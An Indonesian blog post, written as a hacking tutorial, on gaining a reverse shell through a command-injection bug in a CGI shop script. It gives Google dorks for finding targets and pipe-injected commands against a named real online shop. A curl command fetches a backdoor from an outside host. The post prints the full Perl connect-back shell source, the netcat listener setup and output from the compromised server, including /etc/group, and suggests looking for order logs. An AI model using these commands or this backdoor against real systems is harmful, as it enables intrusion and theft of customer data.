Sunday, April 29, 2018
Connect Back melalui BUG CGI
Connect Back melalui BUG CGI
.:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.
Penulis tidak bertanggung jawab atas akibat atau dampak yang disebabkan oleh
penggunaan materi dari tutorial ini. Tujuan penulis hanya ingin menyampaikan
materi kepada pihak-pihak yang bertanggung jawab dan "Want to learn",
tidak kepada pihak-pihak yang ingin merugikan orang lain.
.:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.
Penulis tidak bertanggung jawab atas akibat atau dampak yang disebabkan oleh
penggunaan materi dari tutorial ini. Tujuan penulis hanya ingin menyampaikan
materi kepada pihak-pihak yang bertanggung jawab dan "Want to learn",
tidak kepada pihak-pihak yang ingin merugikan orang lain.
.:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.
Intro
$>Seperti yang sudah kita tahu Bug CGI memungkinkan kita untuk melaksanakan command-command untuk meng-eksploitasi sistem. Tetapi hal ini juga dipengaruhi oleh settingan dari sistem tersebut apakah mengijinkan kita untuk membuat/menulis File di Server tersebut.
Tujuan
$>Membuat suatu backdoor dengan cara connect back melalui CGI Bug
Tools atau Softwarez dan Skill yang diperlukan:
$>Setidaknya mengerti perintah/command *Nix atau Linux (ls, cp, rm, cat, locate ,dll)
$>Softwarez : Browser HTML (Opera, FireFox, IE, dll)
$>Tools : NetCat dan file backdoor (.txt atau .prl)
Tutorial
$>Langkah pertama yang harus dilakukan adalah mencari site yang menggunakan CGI dengan bug : "shop.pl?seite" atau "family_showpage.cgi". Bagaimana mencarinya? yaitu googling dan memasukkan keyword allinurl dengan tambahan bug diatas. Contoh, allinurl:"shop.pl?seite". Maka kita akan dapat berbagai macam halaman yang dapat di-tes bugnya. Pilih salah satu dan kita akan memulai mencoba connect back.
$>Langkah kedua yaitu masukkan perintah/command yang diinginkan diantara char "||", maka perintah kita akan terlihat seperti ini : |perintah|, selain dengan char pipe(|) bisa juga menggunakan char ";". Contoh (dengan bug shop.pl?seite) :
>> https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html&KNR=3055892
>> https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|perintah|&KNR=3055892
>> https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|ls|&KNR=3055892
Maka pada browser kita akan terlihat isi dari direktori server tersebut. Contoh :
finnishorder.pl formmailmalaysia.pl honeymoon.cfg honeymoon.pl honeymoonfinnishorder.pl honeymoonorder.pl ikonboard order.pl preise.pl remview.php shop.cfg shop.pl
Weikkss....Banyak filenya tuh :P
$>Langkah ketiga cek apakah kita diijinkan untuk menulis/membuat file disana dengan perintah "id"
>> https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|id|&KNR=3055892
Kalo benar maka akan tampak :
uid=290076(ade001) gid=103(web) groups=103(web)
Perhatikan User-idnya, Wah sepertinya kita bisa nih nulis/remove File :D
$>Selanjutnya kita upload File Backdoor yang kita ambil dari site lain,
https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|curl -o back.txt http://www.goodwillco.com/tes.txt|&KNR=3055892
Catatan : Site www.goodwillco.com hanya menyediakan file backdoor yaitu tes.txt, kalo sudah tidak ada silahkan copy-paste teks berikut kedalam Notepad dan simpan dengan Ekstensi *.txt, Coding by 1St :D
#!/usr/bin/perl
# Remote Connect-Back Backdoor Shell v1.0.
# (c)AresU 2004
# 1ndonesia Security Team (1st)
# AresU[at]bosen.net
# Usage:
# 1) Listen port to received shell prompt using NetCat on your toolbox,
for example: nc -l -p 9000
# 2) Remote Command Execution your BackDoor Shell, for example: perl
connect.pl <iptoolbox> <ncportlisten>
# --------
# The supplied exploit code is not to be used for malicious purpose,
but for educational purpose only. The Authors and 1ndonesian Security
Team WILL NOT responsible for anything happened by the couse of using all
information on these website.
# ---------
use Socket;
$pamer="(c)AresU Connect-Back Backdoor Shell v1.0 1ndonesia Security
Team (1st) ";
$cmd= "lpd";
$system= echo "`uname -a`";echo "`id`";/bin/sh;
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $! ");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $! ");
$proto=getprotobyname(tcp);
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $! ");
connect(SOCKET, $paddr) || die("Error: $! ");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
print STDOUT $pamer;
system($system);
close(STDIN);
close(STDOUT);
close(STDERR)
Catatan2 : curl -o akan menyimpan file backdoor di server web sasaran dengan nama back.txt Kalo curl -o tidak bisa gunakan wget -o.
$> Lakukan lagi perintah ls untuk melihat apakah file backdoor kita sudah ter-upload...
https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|ls|&KNR=3055892
back.txt finnishorder.pl formmailmalaysia.pl honeymoon.cfg honeymoon.pl honeymoonfinnishorder.pl honeymoonorder.pl ikonboard order.pl preise.pl remview.php shop.cfg shop.pl
Tampaknya file backdoor kita sudah ada tuh :D
$> Buka port di kompie kita dengan binding port melalui netcat.exe, Perintahnya >
C:>netcat.exe -lLvvp 9000
catatan: port 9000 dan drive system bisa diganti sesuai dengan kondisi komputer masing2 :D
Kalo sudah maka netcat akan melisten koneksi yang masuk di port 9000 tersebut
$> Kita akan melakukan connectback dari server korban dengan meng-compile file backdorr tsb :
https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|PERL back.txt 61.xxx.xxx.xxx 9000|&KNR=3055892
catatan: ip 61.xxx.xxx.xxx adalah alamat IP komputer kita dan 9000 adalah port tujuan yang sudah terbuka jika komputer kita memakai proxy atau firewall harap di konfigurasi ulang agar server korban bisa melakukan connectback terhadap kita :D
Bila benar maka :
C:>netcat -lLvvp 9000
listening on [any] 9000 ...
connect to [61.xxx.xxx.xxx] from www.a66.de [213.198.17.90] 14542
(c)AresU Connect-Back Backdoor Shell v1.0
1ndonesia Security Team (1st)
Linux a66.de 2.4.2 FreeBSD 4.7-RELEASE-p22 #5: Tue May 3 13:36:49 MDT
2005
roo i386 unknown
uid=290076(ade001) gid=103(web) groups=103(web)
ls
back.txt
finnishorder.pl
formmailmalaysia.pl
honeymoon.cfg
honeymoon.pl
honeymoonfinnishorder.pl
honeymoonorder.pl
ikonboard
order.pl
preise.pl
remview.php
shop.cfg
shop.pl
su
su: you are not in the correct group (sys) to su root.
weiikkssss....bisa konek ternyata :D, tapi sayangnya kita gak bisa akses super user tuh :( Mungkin kita bisa liat groupnya :
https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|ls /etc|&KNR=3055892
DIR_COLORS X11 bashrc csh.cshrc csh.login filesystems group
host.conf hosts.allow hosts.deny info-dir inputrc
ld.so.cache ld.so.conf ldap_auth master.passwd mhpop_redirect mtab
nsswitch.conf opt pam.d passwd profile profile.d
redhat-release rpc rpm securetty shells skel ssd.attrib syb_dbs
termcap xinetd.d yp.conf
https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|cat /etc/group|&KNR=3055892
sys::0:root,bin,sys,adm,devel,smoc1,daemon,vbackups,sap,sentinel
root::0:root daemon::1:root,daemon bin::2:root,bin,daemon
adm::3:root,adm,daemon mail::4:root uucp::5:uucp rje::8: lp:*:9:
nuucp::10:nuucp user::20: ftp::201:
other::995: guest:*:998: postgres:*:70: news:*:86: mysql:*:88:
sql:*:89: staff::100:devel,smoc1
sybase::101:sybase,devel,webapps,sap,jkoecher,anonweb
client:*:102:devel,root,webapps,urchind web:*:103:root,webapps
nofiles:*:104: qmail:*:105:
devel:*:106:sybase,hu,webapps,sap,ftp,jkoecher,anonweb mailed:*:107:barryg
apps:*:108:hu,idsuser networks:*:109: squid:*:203: solutions:*:1025:
test:*:204: dnsadmin:x:501:named
tsedit:*:110:lvance,chuckr,eduda,ggarza,steve,mbalme mailedit:*:111:mminnig
nogroup:*:65533: webapps:*:149: sap:*:191: nobody:*:60001:
smmsp:*:25:smmsp
Wekkksss...... :( ternyata kita hanya ada di group web doank :~~...gimana ngerubahnya ???
sayangnya tutorial ini hanya membahas caraa kita untuk melakukan connectback dengan menggunakan CGI BUG Untuk lebih jelasnya silakan cari artikel ttg hal tsb di Google :D
Terus kita bisa ngapain ajah nih??? ya macam2 kayak liat file order.log-nya mungkin !!!???? :D (ingat site ini adalah semacam online-shop :D), silakan masukkan perintah locate order.log atau locate .log di browser anda :D hehehehehehhe
//-------------------------------------------------------------------------------//
Special Thanks go to : Myztx @ Myztx Soft House, Om choi @ #e-c-h-o atas tutor dan kesabarannya dalam mengajari junior mu ini :D , admin www.a66.de hehehehe jangan marah ya mas/mbak :P webnya dijadikan percobaan :D n ndak lupa juga to Spyro (the dragon??? :P) atas tempat buat artikel ini di webnya yg makin ciamik :D
Any Comments, Suggestions, Critics, Questions Send an Email >emomelodicfreak@yahoo.com
//-------------------------------------------------------------------------------//
Thanks,
Thanks,
PusHm0v
/* ------------------------------|EOF|------------------------------ */
https://www.facebook.com/pages/Xnonymousblogspotcom/140333742790217
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.